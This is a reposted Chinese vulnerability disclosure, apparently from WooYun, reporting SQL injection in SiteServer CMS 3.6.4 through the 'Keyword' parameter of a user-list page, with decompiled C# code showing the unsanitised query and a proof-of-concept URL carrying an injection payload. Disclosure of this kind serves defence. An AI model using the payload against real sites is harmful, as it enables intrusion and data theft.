热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

siteserver最新版3.6.4 sql inject 漏洞

发布时间:2014-02-24 09:50文章来源:wooyun文章作者:小新 点击次数:
摘要:漏洞作者: 小新 提交时间: 2013-11-25 23:11 公开时间: 2014-02-23 23:11 漏洞类型: SQL注射漏洞 详细说明: 第11个注入存在/UserCenter/cms/contents.aspx 用.NET Reflector 反编译UserCenter.Pages.dll这个文件 查看代码如下: Label_08D1: this.spCon...

漏洞作者: 小新

提交时间: 2013-11-25 23:11
公开时间: 2014-02-23 23:11

漏洞类型: SQL注射漏洞
详细说明:

第11个注入存在/UserCenter/cms/contents.aspx

 

用.NET Reflector 反编译UserCenter.Pages.dll这个文件

 

查看代码如下:

 

 

  1. Label_08D1: 
  2.  
  3. this.spContents.SelectCommand = UserDataProvider.UserDAO.GetSelectCommand(base.Request.QueryString["Keyword"], TranslateUtils.ToInt(base.Request.QueryString["CreateDate"]), TranslateUtils.ToInt(base.Request.QueryString["LastActivityDate"]), true, TranslateUtils.ToInt(base.Request.QueryString["TypeID"]), TranslateUtils.ToInt(base.Request.QueryString["DepartmentID"]), TranslateUtils.ToInt(base.Request.QueryString["AreaID"])); 
  4.  
  5. this.rptContents.ItemDataBound += new RepeaterItemEventHandler(this.x189b5ecd83f1b098); 
  6.  
  7. this.spContents.SortField = UserDataProvider.UserDAO.GetSortFieldName(); 
  8.  
  9. this.spContents.SortMode = SortMode.DESC; 
  10.  
  11. UserGroupInfo groupInfoByCredits = UserGroupManager.GetGroupInfoByCredits(0); 

 

Keyword 很明显的注入

漏洞证明:

http://www.yunsec.net/siteserver/cms/console_user.aspx?PageNum=0&Keyword=1'%20and%201=@@version%20and%201='1&CreateDate=0&Last

 

siteserver最新版3.6.4 sql inject 漏洞

 

标签分类:

上一篇:php云人才系统 注入漏洞
下一篇:杰奇CMS 1.7商业版注入漏洞